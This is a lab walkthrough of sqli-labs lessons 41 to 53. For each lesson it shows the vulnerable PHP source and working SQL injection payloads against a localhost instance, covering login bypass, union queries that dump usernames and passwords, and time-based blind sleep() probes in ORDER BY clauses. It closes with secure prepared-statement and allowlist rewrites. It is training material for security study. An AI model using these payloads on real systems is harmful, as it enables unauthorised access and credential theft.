SQLI-LAB Hands-on Notes (Less 41 - Less 53)
Source: Internet  Editor: 程序博客网  Time: 2024/05/22 00:24
- Less - 41 stacked Query Intiger type blind
  - Test
  - Source Code
  - Solution
- Less - 42 Stacked Query error based
  - Test
  - Source Code
  - Solution
- Less - 43 stacked Query String type
  - Test
  - Source Code
  - Solution
- Less - 44 Stacked Query blind
  - Test
  - Source Code
  - Solution
- Less - 45 Stacked Query Blind based twist
  - Test
  - Source Code
  - Solution
- Less - 46 ORDER BY-Error-Numeric
  - Test
  - Source Code
  - Solution
- Less - 47 ORDER BY Clause-Error-Single quote
  - Test
  - Source Code
  - Solution
- Less - 48 ORDER BY Clause Blind based
  - Test
  - Source Code
  - Solution
- Less - 49 ORDER BY Clause Blind based
  - Test
  - Source Code
  - Solution
- Less - 50 ORDER BY Clause Blind based
  - Test
  - Source Code
  - Solution
- Less - 51 ORDER BY Clause Blind based
  - Test
  - Source Code
  - Solution
- Less - 52 ORDER BY Clause Blind based
  - Test
  - Source Code
  - Solution
- Less - 53 ORDER BY Clause Blind based
  - Test
  - Source Code
  - Solution
The following are only the notes I wrote down while working through the sqli-labs exercises, for reference only.
Since I have already studied some SQL injection, most of the content comes without explanation; if anything is unclear, please look it up with a search engine, which should give you what you need.
Less - 41 stacked Query Intiger type blind
(Lesson 41: stacked query, integer type, blind)
Test:
http://localhost/sqli-lab/Less-41/index.php?id=1'
Note: the query breaks, but no error message is displayed.
Source Code:
```php
$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";   // $id is interpolated unquoted (numeric context)
if (mysqli_multi_query($con1, $sql)) {                 // multi_query: stacked statements are accepted
    if ($result = mysqli_store_result($con1)) {
        if ($row = mysqli_fetch_row($result)) {
            printf("Your Username is : %s", $row[1]);
            printf("Your Password is : %s", $row[2]);
        }
    }
    if (mysqli_more_results($con1)) {
    }
}
// no else branch: mysqli_error() is never printed, so failures are silent (blind)
```
Solution:
http://localhost/sqli-lab/Less-41/index.php?id=0 or 1=1 %23
Others:
http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,version(),database() %23
http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
Less - 42 Stacked Query error based
(Lesson 42: stacked query, error based)
Test:
http://localhost/sqli-lab/Less-42/index.php
POST: login_user=admin&login_password=11'&mysubmit=login
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''11''' at line 1
Note: password is enclosed in single quotes.
Source Code:
```php
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];   // not escaped: the injection point
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql)) {
    /* store first result set */
    if ($result = @mysqli_store_result($con1)) {
        if ($row = @mysqli_fetch_row($result)) {
            if ($row[1]) {
                return $row[1];
            } else {
                return 0;
            }
        }
    } else {
        // the MySQL error text is echoed to the browser: error based
        echo '<font size="5" color= "#FFFF00">';
        print_r(mysqli_error($con1));
        echo "</font>";
    }
} else {
    echo '<font size="5" color= "#FFFF00">';
    print_r(mysqli_error($con1));
    echo "</font>";
}
```
Solution:
login_user=admin&login_password=1' or '1'='1&mysubmit=login
Others:
login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 43 stacked Query String type
(Lesson 43: stacked query, string type)
Test:
http://localhost/sqli-lab/Less-43/index.php
POST: login_user=admin&login_password=11'&mysubmit=login
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''11'')' at line 1
Note: password is enclosed in single quotes (and parentheses).
Source Code:
```php
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];   // not escaped
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";   // quote plus parenthesis context
if (@mysqli_multi_query($con1, $sql)) {
    if ($result = @mysqli_store_result($con1)) {
        if ($row = @mysqli_fetch_row($result)) {
            if ($row[1]) {
                return $row[1];
            } else {
                return 0;
            }
        }
    } else {
        print_r(mysqli_error($con1));   // error text reaches the browser
    }
} else {
    print_r(mysqli_error($con1));
}
```
Solution:
login_user=admin&login_password=1') or ('1')=('1&mysubmit=login
Others:
login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 44 Stacked Query blind
(Lesson 44: stacked query, blind)
Test:
http://localhost/sqli-lab/Less-44/index.php
POST: login_user=admin&login_password=0'&mysubmit=login
Note: no error message is displayed.
Source Code:
```php
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];   // not escaped
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql)) {
    if ($result = @mysqli_store_result($con1)) {
        if ($row = @mysqli_fetch_row($result)) {
            if ($row[1]) {
                return $row[1];
            } else {
                return 0;
            }
        }
    }
}
// same query as Less-42, but mysqli_error() is never printed: blind
```
Solution:
login_user=admin&login_password=1' or '1'='1&mysubmit=login
Others:
login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 45 Stacked Query Blind based twist
(Lesson 45: stacked query, blind based, with a twist)
Test:
http://localhost/sqli-lab/Less-45/index.php
POST: login_user=admin&login_password=0'&mysubmit=login
Note: no error message is displayed.
Source Code:
```php
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];   // not escaped
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";   // quote plus parenthesis context
if (@mysqli_multi_query($con1, $sql)) {
    if ($result = @mysqli_store_result($con1)) {
        if ($row = @mysqli_fetch_row($result)) {
            if ($row[1]) {
                return $row[1];
            } else {
                return 0;
            }
        }
    }
}
// same query as Less-43, but mysqli_error() is never printed: blind
```
Solution:
login_user=admin&login_password=1') or ('1')=('1&mysubmit=login
Others:
login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
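For contrast with the Less-41 to Less-45 sources above, here is the same pair of lookups written the way they should be. This is an added example, not code from the write-up or from sqli-labs; it assumes `$con1` is the lab's mysqli connection, keeps the lab's `users`/`username`/`password` names, and needs PHP 8 with mysqlnd (for `get_result()`).

```php
<?php
// Added example, not part of this write-up or of sqli-labs: the Less-41..45
// lookups rewritten with mysqli prepared statements. $con1 is the lab's mysqli
// connection; users/username/password are the lab's table and columns.
// Assumes PHP >= 8.0 with mysqlnd (needed for get_result()).

// Less-42..45: the login query. The SQL text is fixed; the two values travel
// as bound parameters, so a quote, a ')' or a ';' in either field is just data.
// The parenthesised contexts of Less-43/45 and mysqli_multi_query() are gone:
// there is no quote context to close and no second statement can be appended.
function lookupUser(mysqli $con1, string $username, string $password): ?array
{
    $stmt = $con1->prepare(
        'SELECT id, username FROM users WHERE username = ? AND password = ? LIMIT 1'
    );
    if ($stmt === false) {
        // Keep driver errors server-side. Less-42/43 printed mysqli_error() to
        // the browser, which is what turned the blind case into an error-based one.
        error_log('prepare failed: ' . $con1->error);
        return null;
    }
    $stmt->bind_param('ss', $username, $password);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    // The lab stores plaintext passwords; real code would fetch the stored
    // hash by username only and compare with password_verify().
    return $row ?: null;   // null: no such user/password pair
}

// Less-41: the integer id lookup. Validate the shape first, then bind as 'i',
// so "0 or 1=1" or "0 union select ..." never reach the SQL parser.
function lookupById(mysqli $con1, string $rawId): ?array
{
    if (!ctype_digit($rawId) || strlen($rawId) > 10) {
        return null;   // not a plain decimal id: refuse, do not try to repair it
    }
    $id = (int) $rawId;
    $stmt = $con1->prepare('SELECT id, username FROM users WHERE id = ? LIMIT 1');
    if ($stmt === false) {
        error_log('prepare failed: ' . $con1->error);
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}
```

With `mysqli_multi_query()` replaced by a single prepared statement, the stacked-query variants of these lessons have nothing to stack onto, and the error-based variants get no error text to read.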
Less - 46 ORDER BY-Error-Numeric
(Lesson 46: GET, error based, numeric, ORDER BY clause)
Test:
http://localhost/sqli-lab/Less-46/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Note: numeric type.
http://localhost/sqli-lab/Less-46/index.php?sort=1+asc
http://localhost/sqli-lab/Less-46/index.php?sort=1+desc
Note: a quick way to tell whether ORDER BY injection exists is to check whether the data returned for asc and for desc differs.
Source Code:
```php
$sql = "SELECT * FROM users ORDER BY $id";   // $id is interpolated unquoted into the ORDER BY clause
$result = mysql_query($sql);
if ($result) {
    while ($row = mysql_fetch_assoc($result)) {
        echo $row['id'];
        echo $row['username'];
        echo $row['password'];
    }
} else {
    print_r(mysql_error());   // error text reaches the browser
}
```
Solution:
http://localhost/sqli-lab/Less-46/index.php?sort=1 and if(1=1, sleep(1), null)
Others:
http://localhost/sqli-lab/Less-46/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-46/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 47 ORDER BY Clause-Error-Single quote
(Lesson 47: ORDER BY clause, error based, single quote)
Test:
http://localhost/sqli-lab/Less-47/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
Note: sort is enclosed in single quotes.
Source Code:
```php
$sql = "SELECT * FROM users ORDER BY '$id'";   // $id interpolated inside single quotes
$result = mysql_query($sql);
if ($result) {
    while ($row = mysql_fetch_assoc($result)) {
        echo $row['id'];
        echo $row['username'];
        echo $row['password'];
    }
} else {
    print_r(mysql_error());   // error text reaches the browser
}
```
Solution:
http://localhost/sqli-lab/Less-47/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
Others:
http://localhost/sqli-lab/Less-47/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-47/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 48 ORDER BY Clause Blind based
(Lesson 48: ORDER BY clause, blind based)
Test:
http://localhost/sqli-lab/Less-48/index.php?sort=1'
http://localhost/sqli-lab/Less-48/index.php?sort=1"
http://localhost/sqli-lab/Less-48/index.php?sort=1')
http://localhost/sqli-lab/Less-48/index.php?sort=1")
Note: none of these display an error message.
Source Code:
```php
$sql = "SELECT * FROM users ORDER BY $id";   // $id interpolated unquoted
$result = mysql_query($sql);
if ($result) {
    while ($row = mysql_fetch_assoc($result)) {
        echo $row['id'];
        echo $row['username'];
        echo $row['password'];
    }
}
// no else branch: mysql_error() is never printed, so failures are silent (blind)
```
Solution:
http://localhost/sqli-lab/Less-48/index.php?sort=1 and if(1=1, sleep(1), null)
Others:
http://localhost/sqli-lab/Less-48/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-48/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 49 ORDER BY Clause Blind based
(Lesson 49: ORDER BY clause, blind based)
Test:
http://localhost/sqli-lab/Less-49/index.php?sort=1'
Note: no error message is displayed.
http://localhost/sqli-lab/Less-49/index.php?sort=1"
Note: works normally; together with the previous request, this shows sort is enclosed in single quotes.
Source Code:
```php
$sql = "SELECT * FROM users ORDER BY '$id'";   // $id interpolated inside single quotes
$result = mysql_query($sql);
if ($result) {
    while ($row = mysql_fetch_assoc($result)) {
        echo $row['username'];
        echo $row['password'];
    }
}
// no else branch: mysql_error() is never printed (blind)
```
Solution:
http://localhost/sqli-lab/Less-49/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
Others:
http://localhost/sqli-lab/Less-49/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-49/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 50 ORDER BY Clause Blind based
(Lesson 50: ORDER BY clause, blind based)
Test:
http://localhost/sqli-lab/Less-50/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Note: numeric type.
Source Code:
```php
$sql = "SELECT * FROM users ORDER BY $id";   // $id interpolated unquoted
if (mysqli_multi_query($con1, $sql)) {        // multi_query: stacked statements are accepted
    if ($result = mysqli_store_result($con1)) {
        while ($row = mysqli_fetch_row($result)) {
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
} else {
    print_r(mysqli_error($con1));   // error text reaches the browser
}
```
Solution:
http://localhost/sqli-lab/Less-50/index.php?sort=1 and if(1=1, sleep(1), null)
Others:
http://localhost/sqli-lab/Less-50/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-50/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 51 ORDER BY Clause Blind based
(Lesson 51: ORDER BY clause, blind based)
Test:
http://localhost/sqli-lab/Less-51/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
Note: sort is enclosed in single quotes.
Source Code:
```php
$sql = "SELECT * FROM users ORDER BY '$id'";   // $id interpolated inside single quotes
if (mysqli_multi_query($con1, $sql)) {         // multi_query: stacked statements are accepted
    if ($result = mysqli_store_result($con1)) {
        while ($row = mysqli_fetch_row($result)) {
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
} else {
    print_r(mysqli_error($con1));   // error text reaches the browser
}
```
Solution:
http://localhost/sqli-lab/Less-51/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
Others:
http://localhost/sqli-lab/Less-51/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-51/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 52 ORDER BY Clause Blind based
(Lesson 52: ORDER BY clause, blind based)
Test:
http://localhost/sqli-lab/Less-52/index.php?sort=1'
http://localhost/sqli-lab/Less-52/index.php?sort=1"
http://localhost/sqli-lab/Less-52/index.php?sort=1')
http://localhost/sqli-lab/Less-52/index.php?sort=1")
Note: none of these display an error message.
Source Code:
```php
$sql = "SELECT * FROM users ORDER BY $id";   // $id interpolated unquoted
if (mysqli_multi_query($con1, $sql)) {        // multi_query: stacked statements are accepted
    if ($result = mysqli_store_result($con1)) {
        while ($row = mysqli_fetch_row($result)) {
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
}
// no else branch: mysqli_error() is never printed (blind)
```
Solution:
http://localhost/sqli-lab/Less-52/index.php?sort=1 and if(1=1, sleep(1), null)
Others:
http://localhost/sqli-lab/Less-52/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-52/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 53 ORDER BY Clause Blind based
(Lesson 53: ORDER BY clause, blind based)
Test:
http://localhost/sqli-lab/Less-53/index.php?sort=1'
Note: no error message is displayed.
http://localhost/sqli-lab/Less-53/index.php?sort=1"
Note: works normally; together with the previous request, this shows sort is enclosed in single quotes.
Source Code:
```php
$sql = "SELECT * FROM users ORDER BY '$id'";   // $id interpolated inside single quotes
if (mysqli_multi_query($con1, $sql)) {         // multi_query: stacked statements are accepted
    if ($result = mysqli_store_result($con1)) {
        while ($row = mysqli_fetch_row($result)) {
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
}
// no else branch: mysqli_error() is never printed (blind)
```
Solution:
http://localhost/sqli-lab/Less-53/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
Others:
http://localhost/sqli-lab/Less-53/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-53/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
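The eight ORDER BY lessons (Less-46 to Less-53) all share one root cause: the sort parameter is spliced into the query as an identifier, which a prepared statement cannot bind, and wrapping it in quotes changes nothing because `ORDER BY '1' and <expr>` is still an expression MySQL evaluates. The fix is an allowlist. This is an added example, not code from the write-up or from sqli-labs; it assumes `$con1` is the lab's mysqli connection, keeps the lab's `users`/`id`/`username` names, and the `dir` request parameter is an assumption of this example (the lab only has `sort`).

```php
<?php
// Added example, not part of this write-up or of sqli-labs: the ORDER BY query
// from Less-46..53 with the sort parameter resolved through an allowlist.
// A column name cannot be a bound parameter, and quoting it ('$id' in
// Less-47/49/51/53) does not help: ORDER BY '1' and <expr> is a valid
// expression that MySQL evaluates, which is why sleep() still fires there.
// $con1 is the lab's mysqli connection; users/id/username are the lab's names.

// Request value => real column. Anything not listed is rejected, never escaped.
const SORT_COLUMNS = ['id' => 'id', 'user' => 'username'];

// Returns the SQL text, or null when the sort key is not on the allowlist.
function buildUserListSql(string $sortKey, string $direction = 'asc'): ?string
{
    if (!array_key_exists($sortKey, SORT_COLUMNS)) {
        return null;
    }
    // Direction is reduced to exactly two fixed tokens, never the raw input.
    $dir = strtolower($direction) === 'desc' ? 'DESC' : 'ASC';
    return 'SELECT id, username FROM users ORDER BY `' . SORT_COLUMNS[$sortKey] . '` ' . $dir;
}

function listUsers(mysqli $con1, string $sortKey, string $direction): array
{
    $sql = buildUserListSql($sortKey, $direction);
    if ($sql === null) {
        http_response_code(400);   // bad sort parameter: reject and log, do not run
        error_log('rejected sort parameter: ' . $sortKey);
        return [];
    }
    // Single-statement API instead of mysqli_multi_query() (Less-50..53), so a
    // trailing ';<statement>' could not run even if the allowlist were bypassed.
    $result = $con1->query($sql);
    if ($result === false) {
        error_log('query failed: ' . $con1->error);   // server-side only, never echoed
        return [];
    }
    return $result->fetch_all(MYSQLI_ASSOC);
}

// Usage with the request parameters ('dir' is assumed; the lab only has 'sort'):
// listUsers($con1, $_GET['sort'] ?? 'id', $_GET['dir'] ?? 'asc');
```

A rejected sort key returns 400 with no database round trip at all, so the asc/desc comparison and the `sleep()` timing the notes above rely on have nothing to observe.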